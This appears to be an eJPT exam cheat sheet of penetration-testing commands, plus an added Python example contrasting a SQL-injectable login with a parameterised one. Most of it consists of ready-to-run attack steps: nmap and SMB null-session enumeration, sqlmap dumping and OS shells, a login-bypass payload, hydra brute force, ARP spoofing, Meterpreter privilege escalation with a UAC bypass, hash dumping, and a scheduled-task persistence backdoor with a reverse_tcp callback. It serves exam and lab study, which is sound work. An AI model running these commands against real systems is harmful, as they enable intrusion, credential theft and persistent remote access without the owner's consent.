EJPT Cheat Sheet

All the commands you need to pass the eLearnSecurity Junior Penetration Tester (eJPT) exam

Routing

View the existing routes

route
ip route

Add a route manually (destination network via gateway; needed for pivoting into a network you cannot reach directly)

ip route add <destination-network> via <gateway>

example:

sudo ip route add 192.168.222.0/24 via 10.175.34.1

Enumeration and Scanning

Whois

# registration data for a domain or IP address
whois <domain>

Ping Sweep

# -a: show only alive hosts, -g: generate the target list from the subnet; unreachable-host errors go to /dev/null
fping -a -g <ip-subnet/subnet mask> 2>/dev/null

example:

fping -a -g 192.168.222.0/24 2>/dev/null

Nmap

# OS detection, skip host discovery (-Pn treats the host as up even if it does not answer ping; -O needs root)
sudo nmap -Pn -O 10.10.10.10

# default scripts, version detection
nmap -sC -sV 10.10.10.10

# above + all 65535 TCP ports
nmap -sC -sV -p- 10.10.10.10

# UDP scan with version detection (slow; needs root)
sudo nmap -sU -sV 10.10.10.10

# SYN scan, version detection, OS detection, aggressive (-A already implies -sV -O -sC --traceroute), skip host discovery
# 172.16.64.182,199 scans only .182 and .199; output is saved to nmap.txt
sudo nmap -sS -sV -O -A -Pn 172.16.64.182,199 > nmap.txt

# check for known vulnerabilities using the "vuln" NSE script category
nmap --script=vuln -A 172.16.64.182,199 > nmap.txt

SMB/SAMBA

nbtscan

# NetBIOS name, workgroup and MAC of a host (Windows equivalent: nbtstat -A 10.10.10.10)
nbtscan 10.10.10.10

net view

# list the shares of a remote host (Windows)
net view \\10.10.10.10

net use

# C$     - administrative share for the root of the C: drive
# ADMIN$ - the Windows installation directory (e.g. C:\Windows)
# IPC$   - named pipes for inter-process communication (not listed when browsing shares)

# null session: connect with an empty username and password (IPC$ often allows it, ADMIN$ needs admin credentials)

net use \\10.10.10.10\IPC$ "" /u:""
# The command completed successfully.

net use \\10.10.10.10\ADMIN$ "" /u:""
# System error 5 has occurred.

# Access is denied.

enum

# Windows enum.exe tool, queries the host over SMB (null session unless credentials are given)

# enumerate users
enum -U 10.10.10.10

# enumerate the password policy
enum -P 10.10.10.10

nmblookup

nmblookup -A 10.10.10.10

smbclient

# -L: list shares, -N: no password (null session)
smbclient -L //10.10.10.10 -N

mysql

# connect to a remote MySQL server (no space between -p and the password, or give just -p to be prompted)
mysql -u USERNAME -pPASSWORD -h HOST DB

# select a database
use <db_name>;

# list its tables
show tables;

# dump a table
select * from <table_name>;

SQLi and Sqlmap

# test one parameter of a GET request
sqlmap -u http://10.10.10.10 -p parameter
# POST request: pass the body with --data
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
# interactive OS shell through the DBMS (needs stacked queries or file-write privileges)
sqlmap -u http://10.10.10.10 --os-shell
# dump everything
sqlmap -u http://10.10.10.10 --dump

# list databases
sqlmap -u "http://10.124.211.96/newsdetails.php?id=33" --dbs

# select a database and list its tables
sqlmap -u "http://10.124.211.96/newsdetails.php?id=33" -D database_name --tables

# dump a specific table from a database
sqlmap -u "http://10.124.211.96/newsdetails.php?id=33" -D awd -T accounts --dump

# banner grabbing (DBMS version)
sqlmap -u "http://10.10.10.10/view.php?id=1" -b

# show the database the site is using, then dump it by name
sqlmap -u "http://10.10.10.10/view.php?id=1" --current-db
sqlmap -u "http://10.10.10.10/view.php?id=1" -D selfie4you --dump

# SQL login page bypass: the quote closes the username string, "or 1=1" makes the WHERE clause true for every row,
# and the rest of the query is commented out (MySQL needs a space after "--"; the trailing "-" keeps it from being trimmed)
' or 1=1; -- -
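
Added example (not part of the original cheat sheet): what the payload above does to a typical login query, and why a parameterised query is immune to it. It uses Python's built-in sqlite3 with a constructed in-memory accounts table standing in for a site's MySQL database; the table, account names and passwords are made up for the demonstration.

```python
import sqlite3

# Constructed sample data for this example (not from the cheat sheet): an
# in-memory SQLite database standing in for the MySQL backend of a login page.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO accounts (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("alice", "hunter2")],
    )
    con.commit()
    return con


def build_vulnerable_query(username, password):
    # The classic mistake: user input is pasted straight into the SQL text.
    return (
        "SELECT username FROM accounts "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )


def login_vulnerable(con, username, password):
    """Return the matched username, or None. Vulnerable: the attacker controls the SQL text."""
    row = con.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same check with bound parameters: the payload is compared as a plain
    string value and never parsed as SQL, so it simply fails to match."""
    row = con.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The login bypass payload from the cheat sheet.
PAYLOAD = "' or 1=1; -- -"

if __name__ == "__main__":
    con = make_db()
    # The quote closes the username literal, "or 1=1" makes the WHERE clause
    # true for every row, and "-- -" comments out the password check, so the
    # first account (admin) comes back without knowing any credentials.
    print(build_vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable login returned:", login_vulnerable(con, PAYLOAD, "anything"))
    print("parameterised login returned:", login_safe(con, PAYLOAD, "anything"))
```

Run it to see the injected query: the vulnerable check logs in as the first row (admin) while the parameterised check returns None. Against MySQL the same payload works, which is why the "-- -" comment form is used.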

John for cracking

# dictionary attack restricted to the users listed in users.txt (add --format=<type> if john autodetects the wrong hash type)
john --wordlist=/path/to/wordlist --users=users.txt hashfile

Hydra

# -L user list, -P password list, -t parallel tasks, -s port
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10

SMB / SAMBA

# NetBIOS name lookup
nmblookup -A 10.10.10.10
# list shares (null session)
smbclient -L //10.10.10.10 -N
# connect to a share interactively (null session)
smbclient //10.10.10.10/share -N
# all-in-one enumeration: users, shares, groups, password policy
enum4linux -a 10.10.10.10

ARP spoofing (Dsniff)

# forward intercepted packets on to their real destination so the victims keep connectivity (as root)
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i <interface> -t <target> -r <host>
# -t is the victim to poison; -r also poisons the host, so both directions of the traffic pass through us
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Metasploit

search x
use x
info
show options
show advanced

Meterpreter

background
sessions -l
sessions -i 1
sysinfo
ifconfig
route

# show the user the meterpreter process is running as
getuid

# privilege escalation (User Account Control may block this on UAC-enabled hosts)
getsystem

# if UAC blocks getsystem: background the session, run a UAC bypass module against it, then getsystem again
# background
# use exploit/windows/local/bypassuac
# set session <n>
# exploit

# transfering files
download x /root/
upload x C:\\Windows

# run standard operating system shell
shell


# dump local password hashes (needs SYSTEM): from msfconsole with "set session <n>" and "run", or "run post/windows/gather/hashdump" inside meterpreter
use post/windows/gather/hashdump

Meterpreter - persistence backdoor

# persistent backdoor via a scheduled task - needs an existing meterpreter session
msf > use exploit/windows/local/s4u_persistence
msf (s4u_persistence) > set session 2
#session => 2
msf (s4u_persistence) > set trigger logon
#trigger => logon
msf (s4u_persistence) > set payload windows/meterpreter/reverse_tcp
msf (s4u_persistence) > set lhost 1.2.3.4
msf (s4u_persistence) > set lport 1234
msf (s4u_persistence) > exploit

# start a listener matching the payload, LHOST and LPORT set above (-j runs it as a background job)
msf (s4u_persistence) > use exploit/multi/handler
msf (handler) > set payload windows/meterpreter/reverse_tcp
msf (handler) > set lhost 1.2.3.4
msf (handler) > set lport 1234
msf (handler) > exploit -j

# once the victim restarts and logs on, the task runs the payload and we get a meterpreter shell
